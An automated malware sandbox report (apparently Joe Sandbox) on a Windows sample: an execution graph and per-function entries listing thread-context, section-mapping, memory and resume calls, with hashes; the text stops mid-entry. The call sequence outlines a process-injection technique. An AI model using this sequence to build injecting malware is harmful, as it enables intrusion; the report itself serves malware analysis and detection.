                                                              execution_graph 95805 425543 95806 42555f 95805->95806 95807 425587 95806->95807 95808 42559b 95806->95808 95809 42bf43 NtClose 95807->95809 95815 42bf43 95808->95815 95811 425590 95809->95811 95812 4255a4 95818 42deb3 RtlAllocateHeap 95812->95818 95814 4255af 95816 42bf5d 95815->95816 95817 42bf6a NtClose 95816->95817 95817->95812 95818->95814 95819 42be03 95820 42be78 95819->95820 95821 42be27 95819->95821 95824 40b743 95821->95824 95823 42be71 95825 40b768 95824->95825 95826 40b885 NtReadFile 95825->95826 95827 40b8bc 95826->95827 95827->95823 95828 42b683 95829 42b69d 95828->95829 95832 16d2df0 LdrInitializeThunk 95829->95832 95830 42b6c1 95832->95830 96041 42ee73 96042 42ee83 96041->96042 96043 42ee89 96041->96043 96046 42de73 96043->96046 96045 42eeaf 96049 42c1f3 96046->96049 96048 42de8e 96048->96045 96050 42c210 96049->96050 96051 42c21d RtlAllocateHeap 96050->96051 96051->96048 96052 42bcd3 96053 42bd4d 96052->96053 96054 42bcf4 96052->96054 96057 40b513 96054->96057 96056 42bd46 96060 40b538 96057->96060 96058 40b655 NtCreateFile 96059 40b694 96058->96059 96059->96056 96060->96058 96061 4258d3 96062 4258e2 96061->96062 96063 425929 96062->96063 96066 425967 96062->96066 96068 42596c 96062->96068 96064 42dd93 RtlFreeHeap 96063->96064 96065 425939 96064->96065 96067 42dd93 RtlFreeHeap 96066->96067 96067->96068 96069 41c1d3 96070 41c217 96069->96070 96071 41c238 96070->96071 96076 42b463 96070->96076 96073 41c228 96074 41c244 96073->96074 96075 42bf43 NtClose 96073->96075 96075->96071 96077 42b4bc 96076->96077 96078 42b487 96076->96078 96077->96073 96081 40a673 96078->96081 96080 42b4b5 96080->96073 96084 40a698 96081->96084 96082 40a7b5 NtSuspendThread 96083 40a7d0 96082->96083 96083->96080 96084->96082 96085 41b6f3 96086 41b70b 96085->96086 96088 41b765 96085->96088 96086->96088 96089 41f2f3 96086->96089 96091 41f319 96089->96091 96090 41f532 96090->96088 96091->96090 96114 42efa3 96091->96114 96093 41f3ab 96093->96090 96094 41f479 96093->96094 96095 42b6d3 LdrInitializeThunk 96093->96095 96098 41f498 96094->96098 96122 419dd3 NtMapViewOfSection 96094->96122 96097 41f407 96095->96097 96097->96094 96100 41f410 96097->96100 96102 41f51a 96098->96102 96105 42b363 NtGetContextThread 96098->96105 96099 41f461 96103 41c253 NtDelayExecution 96099->96103 96100->96090 96100->96099 96101 41f442 96100->96101 96120 419dd3 NtMapViewOfSection 96100->96120 96121 427f83 NtDelayExecution 96101->96121 96108 41c253 NtDelayExecution 96102->96108 96107 41f46f 96103->96107 96109 41f4f1 96105->96109 96107->96088 96110 41f528 96108->96110 96111 42b3e3 NtSetContextThread 96109->96111 96110->96088 96112 41f50b 96111->96112 96113 42b4e3 NtResumeThread 96112->96113 96113->96102 96115 42ef13 96114->96115 96116 42de73 RtlAllocateHeap 96115->96116 96119 42ef70 96115->96119 96117 42ef4d 96116->96117 96118 42dd93 RtlFreeHeap 96117->96118 96118->96119 96119->96093 96120->96101 96121->96099 96122->96098 96123 415393 96124 4153ad 96123->96124 96129 418ba3 96124->96129 96126 4153cb 96127 415410 96126->96127 96128 4153ff PostThreadMessageW 96126->96128 96128->96127 96130 418bc7 96129->96130 96131 418bce 96130->96131 96132 418c03 LdrLoadDll 96130->96132 96131->96126 96132->96131 95833 401b24 95834 401b2a 95833->95834 95834->95834 95837 42f333 95834->95837 95840 42d983 95837->95840 95841 42d9a9 95840->95841 95852 4073f3 95841->95852 95843 42d9bf 95851 401c4b 95843->95851 95855 41bfe3 95843->95855 95845 42d9de 95849 42d9f3 95845->95849 95870 42c293 95845->95870 95848 42da02 95850 42c293 ExitProcess 95848->95850 95866 428813 95849->95866 95850->95851 95873 417a63 95852->95873 95854 407400 95854->95843 95856 41c00f 95855->95856 95897 41bed3 95856->95897 95859 41c054 95862 41c070 95859->95862 95864 42bf43 NtClose 95859->95864 95860 41c03c 95861 41c047 95860->95861 95863 42bf43 NtClose 95860->95863 95861->95845 95862->95845 95863->95861 95865 41c066 95864->95865 95865->95845 95867 42886d 95866->95867 95869 42887a 95867->95869 95908 4196f3 95867->95908 95869->95848 95871 42c2b0 95870->95871 95872 42c2c1 ExitProcess 95871->95872 95872->95849 95875 417a7a 95873->95875 95874 417a8f 95874->95854 95875->95874 95877 42c933 95875->95877 95879 42c94b 95877->95879 95878 42c96f 95878->95874 95879->95878 95884 42b6d3 95879->95884 95885 42b6ed 95884->95885 95891 16d2c0a 95885->95891 95886 42b715 95888 42dd93 95886->95888 95894 42c243 95888->95894 95890 42c9d9 95890->95874 95892 16d2c1f LdrInitializeThunk 95891->95892 95893 16d2c11 95891->95893 95892->95886 95893->95886 95895 42c260 95894->95895 95896 42c26d RtlFreeHeap 95895->95896 95896->95890 95898 41beed 95897->95898 95902 41bfc9 95897->95902 95903 42b773 95898->95903 95901 42bf43 NtClose 95901->95902 95902->95859 95902->95860 95904 42b78d 95903->95904 95907 16d35c0 LdrInitializeThunk 95904->95907 95905 41bfbd 95905->95901 95907->95905 95911 41971d 95908->95911 95909 419b8b 95909->95869 95911->95909 95934 424f13 95911->95934 95912 4197bc 95912->95909 95937 4154c3 95912->95937 95914 41982a 95914->95909 95915 42dd93 RtlFreeHeap 95914->95915 95919 419842 95915->95919 95916 419874 95922 41987b 95916->95922 95947 41c083 95916->95947 95918 4198b4 95918->95909 95954 42b873 95918->95954 95919->95916 95943 406f73 95919->95943 95922->95909 95959 42b363 95922->95959 95924 419911 95964 42b3e3 95924->95964 95926 419b1a 95930 419b3d 95926->95930 95977 42b4e3 95926->95977 95927 419931 95927->95926 95969 406fe3 95927->95969 95932 419b5a 95930->95932 95973 41c253 95930->95973 95933 42c293 ExitProcess 95932->95933 95933->95909 95982 42dd03 95934->95982 95936 424f34 95936->95912 95938 415529 95937->95938 95939 4154e2 95937->95939 95940 415600 95938->95940 95994 414f13 95938->95994 95939->95938 95939->95940 95941 41c253 NtDelayExecution 95939->95941 95940->95914 95941->95939 95944 406fa3 95943->95944 95945 41c253 NtDelayExecution 95944->95945 95946 406fc4 95944->95946 95945->95944 95946->95916 95948 41c0a0 95947->95948 96002 42b7c3 95948->96002 95950 41c0f0 95951 41c0f7 95950->95951 95952 42b873 NtMapViewOfSection 95950->95952 95951->95918 95953 41c120 95952->95953 95953->95918 95955 42b894 95954->95955 95956 42b8e9 95954->95956 96011 40b2e3 95955->96011 95956->95922 95958 42b8e2 95958->95922 95960 42b384 95959->95960 95962 42b3b9 95959->95962 96015 40a883 95960->96015 95962->95924 95963 42b3b2 95963->95924 95965 42b43c 95964->95965 95966 42b407 95964->95966 95965->95927 96019 40aa93 95966->96019 95968 42b435 95968->95927 95970 407003 95969->95970 95971 41c253 NtDelayExecution 95970->95971 95972 407023 95970->95972 95971->95970 95972->95926 95974 41c266 95973->95974 96023 42b603 95974->96023 95976 41c291 95976->95930 95978 42b504 95977->95978 95980 42b539 95977->95980 96032 40aca3 95978->96032 95980->95930 95981 42b532 95981->95930 95985 42c073 95982->95985 95984 42dd34 95984->95936 95986 42c094 95985->95986 95988 42c0d9 95985->95988 95990 40bfd3 95986->95990 95988->95984 95989 42c0d2 95989->95984 95992 40bff8 95990->95992 95991 40c115 NtAllocateVirtualMemory 95993 40c140 95991->95993 95992->95991 95993->95989 95997 42c163 95994->95997 95998 42c17d 95997->95998 96001 16d2c70 LdrInitializeThunk 95998->96001 95999 414f35 95999->95940 96001->95999 96003 42b7e4 96002->96003 96004 42b82d 96002->96004 96007 40b0c3 96003->96007 96004->95950 96006 42b826 96006->95950 96008 40b0e8 96007->96008 96009 40b205 NtCreateSection 96008->96009 96010 40b234 96009->96010 96010->96006 96014 40b308 96011->96014 96012 40b425 NtMapViewOfSection 96013 40b460 96012->96013 96013->95958 96014->96012 96017 40a8a8 96015->96017 96016 40a9c5 NtGetContextThread 96018 40a9e0 96016->96018 96017->96016 96018->95963 96022 40aab8 96019->96022 96020 40abd5 NtSetContextThread 96021 40abf0 96020->96021 96021->95968 96022->96020 96024 42b627 96023->96024 96025 42b65c 96023->96025 96028 40bbb3 96024->96028 96025->95976 96027 42b655 96027->95976 96031 40bbd8 96028->96031 96029 40bcf5 NtDelayExecution 96030 40bd11 96029->96030 96030->96027 96031->96029 96033 40acc8 96032->96033 96034 40ade5 NtResumeThread 96033->96034 96035 40ae00 96034->96035 96035->95981 96036 16d2b60 LdrInitializeThunk 96037 419d2f 96038 419d33 96037->96038 96039 42bf43 NtClose 96038->96039 96040 419db2 96039->96040

                                                              Executed Functions

                                                              Function 0040B2E3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 15 40b2e3-40b347 call 40a113 call 40a123 20 40b425-40b45a NtMapViewOfSection 15->20 21 40b34d-40b392 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 15->21 23 40b460-40b467 20->23 24 40b4f7-40b503 20->24 43 40b39d-40b3a3 21->43 26 40b472-40b478 23->26 28 40b4a0-40b4a4 26->28 29 40b47a-40b49e 26->29 30 40b4e6-40b4f4 call 40a1b3 28->30 31 40b4a6-40b4ad 28->31 29->26 30->24 34 40b4b8-40b4be 31->34 34->30 37 40b4c0-40b4e4 34->37 37->34 44 40b3a5-40b3c9 43->44 45 40b3cb-40b3cf 43->45 44->43 45->20 47 40b3d1-40b3ec 45->47 48 40b3f7-40b3fd 47->48 48->20 49 40b3ff-40b423 48->49 49->48
                                                              APIs
                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,4q@,?,?,?,00000000), ref: 0040B44D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SectionView
                                                              • String ID: 4q@$4q@
                                                              • API String ID: 1323581903-352822288
                                                              • Opcode ID: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                              • Instruction ID: 4f0a1b00017ecff07558768542bc8224e4be8ae8b3833d489124d6a477246c7f
                                                              • Opcode Fuzzy Hash: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                              • Instruction Fuzzy Hash: 16711C71E04158DFCB04CFA9C990AEDBBF5AF49304F18816AE859B7341D738AA45CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040B513 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 99 40b513-40b577 call 40a113 call 40a123 104 40b655-40b68e NtCreateFile 99->104 105 40b57d-40b5c2 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 99->105 106 40b694-40b69b 104->106 107 40b72b-40b737 104->107 127 40b5cd-40b5d3 105->127 109 40b6a6-40b6ac 106->109 111 40b6d4-40b6d8 109->111 112 40b6ae-40b6d2 109->112 115 40b71a-40b728 call 40a1b3 111->115 116 40b6da-40b6e1 111->116 112->109 115->107 118 40b6ec-40b6f2 116->118 118->115 121 40b6f4-40b718 118->121 121->118 128 40b5d5-40b5f9 127->128 129 40b5fb-40b5ff 127->129 128->127 129->104 130 40b601-40b61c 129->130 132 40b627-40b62d 130->132 132->104 133 40b62f-40b653 132->133 133->132
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B681
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                              • Instruction ID: 33bbf8d930d8e7cfe3f019b155e8ea3f1efd11963211b11a84fa3dbb01a3117a
                                                              • Opcode Fuzzy Hash: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                              • Instruction Fuzzy Hash: 1C813D71E041589FCB04CFA9C990AEDBBF5AF49304F18816AE459B7341D738A941CF99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040B743 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 135 40b743-40b7a7 call 40a113 call 40a123 140 40b885-40b8b6 NtReadFile 135->140 141 40b7ad-40b7f2 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 135->141 142 40b953-40b95f 140->142 143 40b8bc-40b8c3 140->143 163 40b7fd-40b803 141->163 146 40b8ce-40b8d4 143->146 148 40b8d6-40b8fa 146->148 149 40b8fc-40b900 146->149 148->146 152 40b942-40b950 call 40a1b3 149->152 153 40b902-40b909 149->153 152->142 156 40b914-40b91a 153->156 156->152 159 40b91c-40b940 156->159 159->156 164 40b805-40b829 163->164 165 40b82b-40b82f 163->165 164->163 165->140 167 40b831-40b84c 165->167 168 40b857-40b85d 167->168 168->140 169 40b85f-40b883 168->169 169->168
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B8A9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                              • Instruction ID: d5ca7a445566d5324237c67d8bda7c3d62ebcdba52f65f536e33ce5b52a41de4
                                                              • Opcode Fuzzy Hash: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                              • Instruction Fuzzy Hash: 6B713BB1E14158DBCB04CFA9C890AEDBBF5BF49304F18816AE859B7351D338A945CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040B0C3 Relevance: 1.7, APIs: 1, Instructions: 180nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 171 40b0c3-40b0e2 172 40b0e8-40b127 call 40a123 171->172 173 40b0e3 call 40a113 171->173 176 40b205-40b22e NtCreateSection 172->176 177 40b12d-40b172 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 172->177 173->172 178 40b234-40b23b 176->178 179 40b2cb-40b2d7 176->179 199 40b17d-40b183 177->199 181 40b246-40b24c 178->181 183 40b274-40b278 181->183 184 40b24e-40b272 181->184 188 40b2ba-40b2c8 call 40a1b3 183->188 189 40b27a-40b281 183->189 184->181 188->179 191 40b28c-40b292 189->191 191->188 194 40b294-40b2b8 191->194 194->191 200 40b185-40b1a9 199->200 201 40b1ab-40b1af 199->201 200->199 201->176 203 40b1b1-40b1cc 201->203 204 40b1d7-40b1dd 203->204 204->176 205 40b1df-40b203 204->205 205->204
                                                              APIs
                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,004070F1,00000000,?,?,08000000), ref: 0040B221
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateSection
                                                              • String ID:
                                                              • API String ID: 2449625523-0
                                                              • Opcode ID: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                              • Instruction ID: 01317c8874684397ccd25c89dd95e7ea8e4a3edbd884f59941ddaf063ff58e3a
                                                              • Opcode Fuzzy Hash: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                              • Instruction Fuzzy Hash: CD712C71D14158DFCB05CFA9C890AEDBBB1BF49304F1881AAE859B7341D738A946CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040BFD3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 207 40bfd3-40c037 call 40a113 call 40a123 212 40c115-40c13a NtAllocateVirtualMemory 207->212 213 40c03d-40c082 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 207->213 215 40c140-40c147 212->215 216 40c1d7-40c1e3 212->216 235 40c08d-40c093 213->235 218 40c152-40c158 215->218 220 40c180-40c184 218->220 221 40c15a-40c17e 218->221 224 40c1c6-40c1d4 call 40a1b3 220->224 225 40c186-40c18d 220->225 221->218 224->216 228 40c198-40c19e 225->228 228->224 229 40c1a0-40c1c4 228->229 229->228 236 40c095-40c0b9 235->236 237 40c0bb-40c0bf 235->237 236->235 237->212 238 40c0c1-40c0dc 237->238 240 40c0e7-40c0ed 238->240 240->212 241 40c0ef-40c113 240->241 241->240
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C12D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                              • Instruction ID: 8143565c1ed0993058e6d586fa4036d4e587653beb669d54d7f95b9336940cd5
                                                              • Opcode Fuzzy Hash: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                              • Instruction Fuzzy Hash: 62712F71E04158DFCB04CFA9C890AEDBBF1BF49304F18816AE859BB341D638A946CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040A883 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 279 40a883-40a8a2 280 40a8a8-40a8e7 call 40a123 279->280 281 40a8a3 call 40a113 279->281 284 40a9c5-40a9da NtGetContextThread 280->284 285 40a8ed-40a932 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 280->285 281->280 286 40a9e0-40a9e7 284->286 287 40aa77-40aa83 284->287 307 40a93d-40a943 285->307 289 40a9f2-40a9f8 286->289 291 40aa20-40aa24 289->291 292 40a9fa-40aa1e 289->292 295 40aa66-40aa74 call 40a1b3 291->295 296 40aa26-40aa2d 291->296 292->289 295->287 299 40aa38-40aa3e 296->299 299->295 302 40aa40-40aa64 299->302 302->299 308 40a945-40a969 307->308 309 40a96b-40a96f 307->309 308->307 309->284 310 40a971-40a98c 309->310 312 40a997-40a99d 310->312 312->284 313 40a99f-40a9c3 312->313 313->312
                                                              APIs
                                                              • NtGetContextThread.NTDLL(?,?), ref: 0040A9CD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ContextThread
                                                              • String ID:
                                                              • API String ID: 1591575202-0
                                                              • Opcode ID: c674031fc3c6d6faec61c21221f42bde571c941ef70185204ec33789d614d00a
                                                              • Instruction ID: 4f482aee407727b62c40cc0bfd83b1874f9854e4222006377abdc773f04dfb5b
                                                              • Opcode Fuzzy Hash: c674031fc3c6d6faec61c21221f42bde571c941ef70185204ec33789d614d00a
                                                              • Instruction Fuzzy Hash: 46718FB1E04258DFCB04CFA9C590AEDBBF1BF49304F18846AE459B7381D238AA52CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040AA93 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 315 40aa93-40aaf7 call 40a113 call 40a123 320 40abd5-40abea NtSetContextThread 315->320 321 40aafd-40ab42 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 315->321 323 40abf0-40abf7 320->323 324 40ac87-40ac93 320->324 343 40ab4d-40ab53 321->343 326 40ac02-40ac08 323->326 328 40ac30-40ac34 326->328 329 40ac0a-40ac2e 326->329 332 40ac76-40ac84 call 40a1b3 328->332 333 40ac36-40ac3d 328->333 329->326 332->324 335 40ac48-40ac4e 333->335 335->332 338 40ac50-40ac74 335->338 338->335 344 40ab55-40ab79 343->344 345 40ab7b-40ab7f 343->345 344->343 345->320 347 40ab81-40ab9c 345->347 348 40aba7-40abad 347->348 348->320 349 40abaf-40abd3 348->349 349->348
                                                              APIs
                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040ABDD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ContextThread
                                                              • String ID:
                                                              • API String ID: 1591575202-0
                                                              • Opcode ID: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                              • Instruction ID: d4e5869915a99125bcdad7944eea00a2bf72dfbca1512e106d76b181c7b9fddb
                                                              • Opcode Fuzzy Hash: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                              • Instruction Fuzzy Hash: DC718F71E04258DFCB04CFA9C490AEDBBF2BF49304F18806AE419BB341D638A956DF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040BBB3 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtDelayExecution.NTDLL(0041C291,?,?,?,00000000), ref: 0040BCFE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DelayExecution
                                                              • String ID:
                                                              • API String ID: 1249177460-0
                                                              • Opcode ID: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                              • Instruction ID: 224df048350992204dea636a9cf2136097186a6e34023e583b2a4fcadb8b91eb
                                                              • Opcode Fuzzy Hash: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                              • Instruction Fuzzy Hash: CC712E71E04258DFCB05CFA9C490AEDBBF1AF49304F1880AAE855B7341D738AA45DF99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040ACA3 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 351 40aca3-40acc2 352 40acc8-40ad07 call 40a123 351->352 353 40acc3 call 40a113 351->353 356 40ade5-40adfa NtResumeThread 352->356 357 40ad0d-40ad52 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 352->357 353->352 358 40ae00-40ae07 356->358 359 40ae97-40aea3 356->359 379 40ad5d-40ad63 357->379 361 40ae12-40ae18 358->361 363 40ae40-40ae44 361->363 364 40ae1a-40ae3e 361->364 367 40ae86-40ae94 call 40a1b3 363->367 368 40ae46-40ae4d 363->368 364->361 367->359 370 40ae58-40ae5e 368->370 370->367 374 40ae60-40ae84 370->374 374->370 380 40ad65-40ad89 379->380 381 40ad8b-40ad8f 379->381 380->379 381->356 383 40ad91-40adac 381->383 384 40adb7-40adbd 383->384 384->356 385 40adbf-40ade3 384->385 385->384
                                                              APIs
                                                              • NtResumeThread.NTDLL(004071D5,?,?,?,?), ref: 0040ADED
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                              • Instruction ID: b6f10511c00207d67f0fbc32bcefce55cc479fdc692c5c7557564370438ddd56
                                                              • Opcode Fuzzy Hash: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                                              • Instruction Fuzzy Hash: D3715F71E04258DFCB04CFA9C890AEDBBF2BF49304F18806AE859B7341D638A955CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040A673 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 243 40a673-40a6d7 call 40a113 call 40a123 248 40a7b5-40a7ca NtSuspendThread 243->248 249 40a6dd-40a722 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 243->249 251 40a7d0-40a7d7 248->251 252 40a867-40a873 248->252 271 40a72d-40a733 249->271 254 40a7e2-40a7e8 251->254 255 40a810-40a814 254->255 256 40a7ea-40a80e 254->256 259 40a856-40a864 call 40a1b3 255->259 260 40a816-40a81d 255->260 256->254 259->252 262 40a828-40a82e 260->262 262->259 265 40a830-40a854 262->265 265->262 272 40a735-40a759 271->272 273 40a75b-40a75f 271->273 272->271 273->248 275 40a761-40a77c 273->275 276 40a787-40a78d 275->276 276->248 277 40a78f-40a7b3 276->277 277->276
                                                              APIs
                                                              • NtSuspendThread.NTDLL(?,?), ref: 0040A7BD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: SuspendThread
                                                              • String ID:
                                                              • API String ID: 3178671153-0
                                                              • Opcode ID: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                              • Instruction ID: e0512f439ae47d9be5cbe886a187579ca4bcb7003b3baa994f3caa2f25e50319
                                                              • Opcode Fuzzy Hash: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                                              • Instruction Fuzzy Hash: 95714F75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7341D638A956CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00418BA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C15
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                              • Instruction ID: 3a7d3c80330e5758b3a9f81f32ca88ff767ca5b188dc6faacfe14b01834f0b54
                                                              • Opcode Fuzzy Hash: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                                              • Instruction Fuzzy Hash: 470152B5E0010DB7DB10DAE5DD42FDEB7789B54308F0081AAE90897240F635EB588795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0042BF43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2391790810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_opp.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                                              • Instruction ID: d89d2c0c652fac5e8b7a6d34093b53a94ebb12e8b588f04006b5246e933adf9e
